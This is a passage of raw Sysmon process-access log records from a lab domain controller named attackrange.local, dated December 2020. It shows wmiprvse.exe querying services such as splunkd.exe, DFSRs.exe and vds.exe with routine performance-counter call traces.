Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005129Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005128Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005127Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005126Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005125Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005124Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005123Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005122Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005121Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005120Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005119Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005118Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005117Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005116Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005115Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005114Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 